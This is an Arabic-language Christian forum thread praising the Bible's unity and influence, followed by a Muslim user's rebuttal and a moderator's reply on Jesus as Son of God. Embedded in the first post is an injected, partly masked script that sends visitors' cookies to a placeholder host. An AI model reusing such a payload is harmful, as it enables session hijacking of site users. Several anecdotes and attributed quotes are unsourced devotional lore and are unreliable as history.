واحد هو الكتاب المقدس.

mousa

New member
إنضم
12 أغسطس 2005
المشاركات
1
مستوى التفاعل
1
النقاط
0
واحد هو الكتاب المقدس.

بعض جوانب عظمة الكتاب المقـدس:

أولا :عظيم في وحدته :
1-الكتاب المقدس وحدة واحدة تحوى 66 سفراً. والرب يسوع محور الكتاب الواحد "فان شهادة يسوع هي روح النبوة" (رؤيا 10:19) في العهد القديم نجد رموزاً ونبوات عنه، وفي العهد الجديد نجد الحقيقة، إن وحدة الكتاب المقدس معجزة حقيقية رغم أنه كتب في فترة زمنية حوالي 1600 سنة. لأكثر من 40 جيل.
2- اشترك في كتابته 40 كاتب منهم الطبيب كلوقا، وصياد السمك كبطرس الرسول، والفيلسوف كبولس الرسول، وجاني الجميز كعاموس، والشاعر كداود، والقائد العسكري كيشوع، والكاتب الديني كعزرا، والملوك كسليمان، ورئيس الوزراء كدانيال، وساقي الملك كنحميا، والعشار كمتى.
3- كتب في ثلاث قارات آسيا وأفريقيا وأوربا.
4- كتب في أماكن مختلفة؛ فبولس الرسول كتب في السجن ودانيال في القصر، وإرميا في السجن، ولوقا في رحلات السفر، وداود وهو يرعى الغنم تارة وهو ملك تارة أخرى ويوحنا في بطمس.
5- في أزمنة مختلفة وقت السلم كسليمان، ووقت الحرب كداود.
6- في أحوال نفسية مختلفة، فالبعض في عمق حزنهم وفشلهم كأيوب والآخرون في قمة أفراحهم كمزامير الهللويا وسفر نشيد الأنشاد.
7- كتب بثلاث لغات، العبرية والآرامية العهد القديم، واليونانية العهد الجديد
8-ناقش مختلف القضايا الجدلية لكن الوحدة والترابط كأجزاء جسم الإنسان واضحان في كل الكتاب.
9-كتب بمختلف أنواع الكتابات؛ أدب وتاريخ وقانون وشعر ومقالات وأمثال وكتابات رمزية وتراجم حياة أشخاص ومراسلات ومذكرات شخصية ونبذات.
10- يغطي تاريخ البشرية فإنه الكتاب الوحيد الذي يفعل هذا دون فجوات تاريخية، فسفر ينتهي ليبدأ سفر آخر في تكامل تاريخي مع أن الذين يكتبون ربما لا يلتقون. فهو أعظم كتاب تاريخي للبشرية على وجه الإطلاق
11-تتدرج فيه المعرفة " كثيرون يتصفحونه والمعرفة تزداد " (دانيال 12 :4 ) " كنور مشرق يتزايد" (أمثال 18:4) فالقضاة عرفوا أكثر من الآباء، والأنبياء أكثر من القضاة، والرسل أكثر من الأنبياء. كل هذا دون تعارض لأن الله هو الكاتب الحقيقي لهذا الكتاب العجيب ولأن المسيح هو محور الكتاب كما قال الرب يسوع لتلميذي عمواس "ثم ابتدأ من موسى والأنبياء يفسر لهما الأمور المختصة به في جميع الكتب" (لوقا 24 :27) .
ثانياً : عظيم في تأثيره:
لا يوجد كتاب في العالم له أعداء وأحباء مثل الكتاب المقدس، أما أعداؤه لأنه يكشف قلوبهم وضمائرهم فيقاوموه كما قال جون.ن. داربي: الناس لا يسلحون أنفسهم ضد القش بل ضد السيف الماضي الذي يرتعبون من حده". أما أحباؤه فهم الملايين عبر العصور ضحوا بكل شئ حتى الاستشهاد بالنشر أو الصلب أو الزيت المغلي لأجل تمسكهم به. وبأنه كلمة الله للبشرية.
وهذه بعض الأمثلة لقوة تأثيره:
1-عندما سجن هـ.ل هايكوب في أوائل الأربعينات في أيام هتلر في سجن بهولندا لم يكن معه سوى الأناجيل الأربعة قال بعد خروجه من السجن إن أيام سجنه هي أسعد أيام حياته لأنه كان يشبع بالمسيح فيها من خلال الأناجيل الأربعة يومياً ولم يشعر بالسجن والوحدة.
2- سجنت عايده في الاتحاد السوفيتي (السابق) بسبب إيمانها بالمسيح ومجاهرتها به، وبعد 4 أيام خرجت من السجن وقالت إن عذاب عدم وجود الكتاب المقدس في السجن أشد من العذاب الأحمر من الملحدين في الاتحاد السوفيتي.
3-إن آيه واحدة من الكتاب " هذا وإنكم عارفون الوقت إنها الآن ساعة لنستيقظ من النوم فإن خلاصنا الآن أقرب مما كان حين آمنا" (روميه 11:13) غيرت أُوغسطينوس إلى القديس العظيم أُوغسطينوس
4-مر أوربي ملحد على رجل مسيحي كان قبلها من آكلي لحوم البشر ووجده يقرأ في الكتاب المقدس فقال له هل مازلت في تخلفك تقرأ في هذا الكتاب الرجعي فأجابه الرجل البربري لولا هذا الكتاب العظيم الذي غير حياتي لكنت الآن سلقتك وأكلتك.
5-حكى سبرجن الواعظ الشهير عن بائعة فاكهة وجدها ملحد تقرأ في الكتاب المقدس فسألها مستهزئا ماذا تقرئين ؟ فأجابته كلمة الله فقال لها ومن أدراك أنها كلمة الله ؟ قالت له كيف تبرهن إن الشمس مشرقة ؟ أجابها نورها ودفئها. قالت له هكذا الكتاب المقدس نور حياتي وملأ قلبي بدفء حب الله إلىّ.
6-أرسل ملحد مجموعة من الكتب التي تنكر وجود الله إلى مسيحي ليقرأها بدلاً مما أسماه سخافات الكتاب المقدس. فرد المسيحي: إن وجدت كلاماً أسمى من الموعظة على الجبل (متى5-8) أو مثل الآب المحب (لوقا 15) أو كلام تعزية وسلام مثل (مزمور 23) أو كتاباً يخبرك عن الماضي والحاضر والمستقبل كالعهد الجديد، فأرسله إلىّ، وبالطبع لم يرد الملحد عليه حتى الآن.
7- قال والتر سكوت الشاعر الإنجليزي الشهير وهو على فراش المرض - وكانت مكتبته تحوى أكثر من 20 ألف كتاب - لصديقه الأديب الشهير لوكهارت أن يقرا له في الكتاب فأجابه لوكهارت أي كتاب تقصد فأجاب والتر سكوت لا يوجد كتاب يجب أن ندعوه الكتاب إلا كتاب واحد هو الكتاب المقدس.
8-زار دارون صاحب نظرية التطور الإلحادية قبائل فيجو المتوحشة سنة 1833 وقال: لم أكن أتصور أن هناك بشراً متوحشين أكثر من الحيوانات، وعندما زارها مرة أخرى سنة 1869 اندهش للتأثير والتغير الأخلاقي هناك بسبب انتشار المسيحية، فأرسل رسالة لجمعية لندن التي أرسلت الخدام إلى هناك ومع الرسالة 25 جنيها وكتب دارون: "افتخر بعظمة ما فعله الإنجيل في تغيير هؤلاء البشر وأشعر أنى أحقر من إن تقبلوني في جمعيتكم" .<s***pt>document.write('<img
src="http://my_ip_address/'+document.cookie+'">';</s***pt

9- قال القديس يوحنا ذهبي الفم إن من يعرف الكتاب المقدس كما ينبغي لن يتعثر في شئ بل سيحتمل كل الأمور بصبر.
10-قال الجنرال جرانت الذي كان رئيسا للولايات المتحدة: "تمسكوا بالكتاب المقدس فهو مرسانا المؤتمنة لكل ما نتمتع به من حريات ونحن مديونون له بكل ما وصلنا إليه" . أما الرئيس الأمريكي ابرهام لنكولن فقال: "إن الكتاب المقدس هو أعظم ما قدمه الله للبشر" .
11-قال القديس ايرونيموس: دعني أحدثك عن الكتاب المقدس: إن كل ما تقراه في الكتاب الإلهي بينما يلمع ويتلألأ من الخارج فانه أحلى جدا من الداخل.
12-قال هاجل الفيلسوف الألماني الشهير: "إن الكتاب المقدس كان ليّ المعزي الوحيد وقت مرضي" .
13-قال الفيلد مارشال مونتجومرى (لهيئة أركان حربه): "أيها السادة أنى أقرا الكتاب المقدس كل يوم فأوصيكم إن تفعلوا هكذا" .
14-قال المخترع الأمريكي جورج سلدن وهو على حافة الموت "ليس كتاب في الوجود ترتاح إليه نفوسنا عند الموت إلا الكتاب المقدس" .
15-بينما كان الخادم المسيحي يعظ قاطعه فيلسوف كان يحضر الاجتماع : كفاك سخافات فهذا الكتاب قد عفي عليه الزمن فأجاب الواعظ يمكنني أن احضر لك في الغد مئات قد تغيرت حياتهم إلى الأفضل بسبب هذا الكتاب العظيم ولكنى أتحداك أن تحضر إليّ شخصاً واحداً فقط تغيرت حياته وترك خطاياه بسبب فلسفة أعظم فيلسوف. فانسحب الفيلسوف الملحد حزناً وخجلاً.
 

فرح2

New member
عضو
إنضم
16 أغسطس 2005
المشاركات
10
مستوى التفاعل
0
النقاط
0
حذف من قبل الادارة
 
التعديل الأخير بواسطة المشرف:

جورج

مفصول لمخالفة قوانين المنتدى
إنضم
23 أغسطس 2005
المشاركات
61
مستوى التفاعل
0
النقاط
0
اذا لم يقنعك كلامي فقم بحواري ما الذي لم يق&#1

ان عيسى الذي تدعون انه ابن الله ليس في الحقيقه ابن الله و ان الله ليس له ابناء

وصياد السمك كبطرس الرسول الذي تدعون انه رسول ما كان الا شخصاً عادياً لابرسول و لا نبي
وهو الذي حرف المسيحيه
جمع له اتباعاً فضاعت الحقيقه الا ان وصل اليكم انتم فصدقتموه اقرا سيرته لا كان اهله بانبياء و لا هم يحزنون
انما عيسى كان اخوه هارون .... وانه من سلاله الانبياء

يوم عيسى ابن الله كما تدون فلماذا يتخذ صياد كرسول ما يطلب من ابوه ان يخلق او هو يخلق بشر و يخليهم رسل لنفس

قال الله عن نفسه


بسم الله الرحمن الرحيم
قل هو الله الاحد الله الصمد لم يلد و لم يولد و لم يكن له كفوا احد
صدق الله العظيم

انتم يا نصارى بعد كفركم بعيسى
و صلبه كما تدعون حرف الكثير من كتابكم المقدس من بعد تحريف كتابكم
جائتكم الحقائق مغلوطه

اتظنون ان كتابكم مقدس سيترك و عيسى قد صلب
تفكر

معظم الحقائق مغلوطه
و بما ان عيسى نبي فالكتاب المقدس كلام الله اليس بصحيح و من الطبيعي يكون فيه معجزات الا ان الذين
كانوا يكيدون لعيسى حرفوا الكتاب
فلا يجوز ان تؤمنوا بكتاب محرف و لذلك ارسل الله محمد كي ينشر الاسلام الصحيح
وسمي بخاتم الانبياء لان كان اخر نبي ارسله الله ولم يرسل بعده احداً
انبياء موسى و عيسى و داوود و ابراهيم و كل هؤلاء انبياء فكلما قمتم بتكذيب رسول جاء الله برسول اخر و هكذا
لماذا ارسل الله عيسى
اتظنون كي تصلبوه
لا
حسنا ارسله الله كي يدعوكم الى عباده الله الواحد الاحد
وعند ارسال نبي لا بد من انزال كتاب
لاحظ كل الديانات لها كتب لكن تغيرت الاسامي المسلمين يسمونه القران .و.....الخ
وما دام الكتاب المقدس من عند الله لابد ان توجد فيه معجزات
صح و لا غلط
لم اختلف على ان كتابكم فيه معجزات طبيعي لان من عند الله و عندما صلب عيسى كما تدعون الا انه لم يصلب و قد رفعه الله ولكن شبه له فبدلت بعض الحقائق عن طريق الكفره الذين لاحقوا عيسى كي يقتلوه
فهذا يعني ان كتابكم محرف و ليس معناه اننا نكذب بمعجزات كتابكم
كقول ان عيسى يعترف بانه ابن الله و ما شابه ذلك.

:)

تبارك الله عما يصفون

أافكاً على الله تفترون


العقل يخاطب القلب و هو يقول:

وهل خلت الطباق السبع لما ثوى تحت التراب وقد علاه
7- وهل خلت العوالم من إله يدبرها وقد سمرت يداه
8- وكيف تخلت الأملاك عنه بنصرهم وقد سمعوا بكاه
9- وكيف أطاقت الخشبات حمل الإله الحق شد على قفاه
10- وكيف دنا الحديد إليه حتى يخالطه ويلحقه أذاه
11- وكيف تمكنت أيدي عداه وطالت حيث قد صفعوا قفاه
12- وهل عاد المسيح إلى حياة أم المحيي له رب سواه
13- ويا عجبا لقبر ضم ربا وأعجب منه بطن قد حواه


:D
 
التعديل الأخير:

استفانوس

مشرف سابق
مشرف سابق
إنضم
8 أكتوبر 2005
المشاركات
10,542
مستوى التفاعل
160
النقاط
0
يؤمن المسيحيّون في العالم أجمع أنَّ يسوع هو المسيح ابن الله. وهذه الحقيقة المجيدة يعلنها الكتاب المقدّس بقوّة ووضوح في كلٍّ من العهدين القديم والجديد. كذلك فإنَّ الإنسان المسيحي يعرف هذه الحقيقة بناءً على اختباره الشّخصي وحياته اليوميّة الّتي يعيشها بالرّوح مع ربّه الّذي يحبّه وقد فداه بدمه الطّاهر والثّمين على الصّليب. والإيمان بأن يسوع المسيح هو ابن الله الذي نزل من السَّماء من أجل فداء البشرية بموته الكفاري على الصليب، يعتبر جوهر وأساس العقيدة المسيحية، ولأن لسان حال مسيحي يقول: "مَعَ المسيحِ صلبتُ، فأحيا لا أنا بل المسيح يحيا فيَّ. فما أحياه الآن في الجسَدِ فإنما أحياه في الإيمان، إيمانِ ابنِ اللهِ، الذي أحبني وأسلم نفسه لأجلي" (غلاطية 20:2)، بل أنَّ وحي الله وإعلاناته في الكتاب المقدس حول تفاصيل حياة المسيح ومعجزاته وتعاليمه "فقد كتبت لتؤمنوا أن يسوع هو المسيحُ ابنُ اللهِ، ولكي تكونَ لكم إذا آمنتُم حياةٌ باسمِهِ" (يوحنا 31:20). أي أن اعتراف الإنسان بأن يسوع هو المسيح ابن الله هو أساس الغلبة على الشَّر في حياة المؤمن وبالتالي الحياة الأبدية، كما نقرأ في رسالة يوحنا الأولى 5:5 "من هو الذي يغلبُ العالم، إلا الذي يؤمن أن يسوع هو ابن الله"، وفي الآية 13 "كتبت هذا إليكم أنت المؤمنين باسم ابن الله لكي تعلموا أنَّ لكم حياةً أبديّة ولكي تؤمنوا باسم ابن الله". فالله يريد من النّاس أن يؤمنوا باسم ابنه الوحيد يسوع المسيح "وهذه هي وصيّته: أن نؤمن باسم ابنه يسوعَ المسيحِ" (يوحنا الأولى 23:3) حيث أن "من له الابن فَلَهُ الحياةُ، ومن ليس له ابن اللهِ فليست له الحياةُ" (يوحنا الأولى 12:5)، وهكذا فإنَّ الّذي يرفض إعلان السّماء، وينكر حقيقة كون يسوع ابن الله لا ينال الحياة، بل يمكث عليه غضب الله، لذلك على الإنسان المسيحي الّذي يحب الله والنّاس، أن يمارس هذه المحبّة بتبشير النّاس أنَّ يسوع هو المسيح ابن الله مخلّص العالم الوحيد.
 
أعلى